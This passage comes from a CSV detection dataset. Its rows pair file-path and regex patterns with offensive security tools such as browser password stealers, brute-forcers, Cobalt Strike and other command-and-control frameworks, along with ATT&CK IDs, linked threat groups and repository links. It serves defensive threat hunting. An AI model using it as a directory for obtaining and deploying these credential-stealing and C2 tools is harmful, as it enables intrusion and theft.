"*/BrowserGhost/releases/download/*",".{0,1000}\/BrowserGhost\/releases\/download\/.{0,1000}","offensive_tool_keyword","BrowserGhost","This is a tool for grabbing browser passwords","T1555.003 - T1555.013 - T1003.008","TA0006","N/A","N/A","Credential Access","https://github.com/QAX-A-Team/BrowserGhost","1","1","N/A","N/A","10","10","1414","206","2022-05-21T14:09:45Z","2020-06-12T12:19:06Z","5820"
"*/BrowserGhost/tarball/*",".{0,1000}\/BrowserGhost\/tarball\/.{0,1000}","offensive_tool_keyword","BrowserGhost","This is a tool for grabbing browser passwords","T1555.003 - T1555.013 - T1003.008","TA0006","N/A","N/A","Credential Access","https://github.com/QAX-A-Team/BrowserGhost","1","1","N/A","N/A","10","10","1414","206","2022-05-21T14:09:45Z","2020-06-12T12:19:06Z","5821"
"*/BrowserGhost/zipball/*",".{0,1000}\/BrowserGhost\/zipball\/.{0,1000}","offensive_tool_keyword","BrowserGhost","This is a tool for grabbing browser passwords","T1555.003 - T1555.013 - T1003.008","TA0006","N/A","N/A","Credential Access","https://github.com/QAX-A-Team/BrowserGhost","1","1","N/A","N/A","10","10","1414","206","2022-05-21T14:09:45Z","2020-06-12T12:19:06Z","5822"
"*/browserhistory.csv*",".{0,1000}\/browserhistory\.csv.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","1","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","5823"
"*/BrowserSnatch.git*",".{0,1000}\/BrowserSnatch\.git.{0,1000}","offensive_tool_keyword","BrowserSnatch","steals important data from all chromium and gecko browsers installed in the system and gather the data in a stealer db to be exfiltrated out. A powerful Browser Stealer","T1081 - T1074 - T1114 - T1005 - T1041 - T1027","TA0006 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/shaddy43/BrowserSnatch","1","1","N/A","N/A","10","3","246","39","2025-03-31T21:04:30Z","2024-08-26T18:38:42Z","5824"
"*/BrowserSnatch/releases/download*",".{0,1000}\/BrowserSnatch\/releases\/download.{0,1000}","offensive_tool_keyword","BrowserSnatch","steals important data from all chromium and gecko browsers installed in the system and gather the data in a stealer db to be exfiltrated out. A powerful Browser Stealer","T1081 - T1074 - T1114 - T1005 - T1041 - T1027","TA0006 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/shaddy43/BrowserSnatch","1","1","N/A","N/A","10","3","246","39","2025-03-31T21:04:30Z","2024-08-26T18:38:42Z","5825"
"*/BrowserSnatch-master*",".{0,1000}\/BrowserSnatch\-master.{0,1000}","offensive_tool_keyword","BrowserSnatch","steals important data from all chromium and gecko browsers installed in the system and gather the data in a stealer db to be exfiltrated out. A powerful Browser Stealer","T1081 - T1074 - T1114 - T1005 - T1041 - T1027","TA0006 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/shaddy43/BrowserSnatch","1","1","N/A","N/A","10","3","246","39","2025-03-31T21:04:30Z","2024-08-26T18:38:42Z","5826"
"*/BrtoVenomRenames.sh*",".{0,1000}\/BrtoVenomRenames\.sh.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","5827"
"*/brute force.cna*",".{0,1000}\/brute\sforce\.cna.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","5828"
"*/Brute/BruteStager*",".{0,1000}\/Brute\/BruteStager.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","5829"
"*/bruteforce.py*",".{0,1000}\/bruteforce\.py.{0,1000}","offensive_tool_keyword","Vajra","Vajra is a UI based tool with multiple techniques for attacking and enumerating in target's Azure environment","T1087 - T1098 - T1583 - T1078 - T1110 - T1566 - T1537 - T1020 - T1526 - T1482","TA0003 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tool","https://github.com/TROUBLE-1/Vajra","1","1","N/A","N/A","N/A","4","391","61","2025-02-21T16:40:23Z","2022-03-01T14:31:27Z","5830"
"*/bruteforce-ftp.py*",".{0,1000}\/bruteforce\-ftp\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","5831"
"*/bruteforce-http.py*",".{0,1000}\/bruteforce\-http\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","5832"
"*/Bruteforcer.*",".{0,1000}\/Bruteforcer\..{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","5833"
"*/bruteforce-rdp.py*",".{0,1000}\/bruteforce\-rdp\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","5834"
"*/bruteforce-smb.py*",".{0,1000}\/bruteforce\-smb\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","5835"
"*/bruteforce-ssh.py*",".{0,1000}\/bruteforce\-ssh\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","5836"
"*/bruteratel*",".{0,1000}\/bruteratel.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","5837"
"*/brute-ratel-armx64*",".{0,1000}\/brute\-ratel\-armx64.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","5838"
"*/brute-ratel-linx64*",".{0,1000}\/brute\-ratel\-linx64.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","5839"
"*/brutereflect.dll*",".{0,1000}\/brutereflect\.dll.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","5840"
"*/BruteSploit*",".{0,1000}\/BruteSploit.{0,1000}","offensive_tool_keyword","BruteSploit","BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text","T1110","N/A","N/A","N/A","Exploitation tool","https://github.com/screetsec/BruteSploit","1","1","N/A","N/A","N/A","8","741","263","2020-04-05T00:29:26Z","2017-05-31T17:00:51Z","5841"
"*/brutespray.git*",".{0,1000}\/brutespray\.git.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","1","N/A","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","5842"
"*/brutespray/*",".{0,1000}\/brutespray\/.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","1","N/A","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","5843"
"*/brutespray/*",".{0,1000}\/brutespray\/.{0,1000}","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5844"
"*/brutespray_*",".{0,1000}\/brutespray_.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","1","N/A","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","5845"
"*/BruteStager.cs*",".{0,1000}\/BruteStager\.cs.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","5846"
"*/BucketLoot.git*",".{0,1000}\/BucketLoot\.git.{0,1000}","offensive_tool_keyword","BucketLoot","BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text","T1562.007 - T1119 - T1530","TA0006 - TA0010","N/A","N/A","Discovery","https://github.com/redhuntlabs/BucketLoot","1","1","N/A","N/A","7","5","409","58","2025-01-22T10:48:27Z","2023-07-17T09:06:14Z","5849"
"*/build/encrypted_shellcode*",".{0,1000}\/build\/encrypted_shellcode.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RCStep/CSSG","1","1","N/A","N/A","10","10","654","112","2025-01-08T23:11:49Z","2021-01-12T14:39:06Z","5850"
"*/build/formatted_shellcode*",".{0,1000}\/build\/formatted_shellcode.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RCStep/CSSG","1","1","N/A","N/A","10","10","654","112","2025-01-08T23:11:49Z","2021-01-12T14:39:06Z","5851"
"*/build/shellcode*",".{0,1000}\/build\/shellcode.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RCStep/CSSG","1","1","N/A","N/A","10","10","654","112","2025-01-08T23:11:49Z","2021-01-12T14:39:06Z","5852"
"*/build_arsenal_kit.sh*",".{0,1000}\/build_arsenal_kit\.sh.{0,1000}","offensive_tool_keyword","ElusiveMice","Cobalt Strike User-Defined Reflective Loader with AV/EDR Evasion in mind","T1620 - T1055.012 - T1202","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/mgeeky/ElusiveMice","1","1","N/A","N/A","10","5","449","78","2023-07-12T17:54:07Z","2021-08-27T19:22:20Z","5853"
"*/BuildBOFs/*",".{0,1000}\/BuildBOFs\/.{0,1000}","offensive_tool_keyword","cobaltstrike","C# .Net 5.0 project to build BOF (Beacon Object Files) in mass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ceramicskate0/BOF-Builder","1","1","N/A","N/A","10","10","28","4","2023-07-25T22:19:27Z","2021-09-07T01:28:11Z","5854"
"*/burp/releases/community/latest*",".{0,1000}\/burp\/releases\/community\/latest.{0,1000}","offensive_tool_keyword","burpsuite","The class-leading vulnerability scanning. penetration testing. and web app security platform","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://portswigger.net/burp","1","1","N/A","network exploitation tool","N/A","N/A","N/A","N/A","N/A","N/A","5855"
"*/burp-api/*",".{0,1000}\/burp\-api\/.{0,1000}","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation tool","https://github.com/JGillam/burp-co2","1","1","N/A","network exploitation tool","N/A","2","152","34","2024-02-21T02:23:00Z","2015-04-19T03:38:34Z","5856"
"*/burp-Dirbuster*",".{0,1000}\/burp\-Dirbuster.{0,1000}","offensive_tool_keyword","dirbuster","Dirbuster plugin for Burp Suite","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Reconnaissance","https://github.com/vulnersCom/burp-Dirbuster","1","1","#linux","N/A","N/A","1","70","28","2017-02-22T08:31:32Z","2017-02-22T08:24:05Z","5857"
"*/burpee.py*",".{0,1000}\/burpee\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Quick python utility I wrote to turn HTTP requests from burp suite into Cobalt Strike Malleable C2 profiles","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CodeXTF2/Burp2Malleable","1","1","N/A","N/A","10","10","385","34","2023-04-06T15:24:12Z","2022-08-14T18:05:39Z","5858"
"*/BurpExtender.java*",".{0,1000}\/BurpExtender\.java.{0,1000}","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0010 - TA0007 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/JGillam/burp-co2","1","1","N/A","network exploitation tool","N/A","2","152","34","2024-02-21T02:23:00Z","2015-04-19T03:38:34Z","5859"
"*/burp-proxy*",".{0,1000}\/burp\-proxy.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","5860"
"*/BurpSuite-collections*",".{0,1000}\/BurpSuite\-collections.{0,1000}","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","network exploitation tool","N/A","10","3533","676","2025-03-05T12:04:51Z","2020-01-25T02:07:37Z","5861"
"*/BUYTHEAPTDETECTORNOW*",".{0,1000}\/BUYTHEAPTDETECTORNOW.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 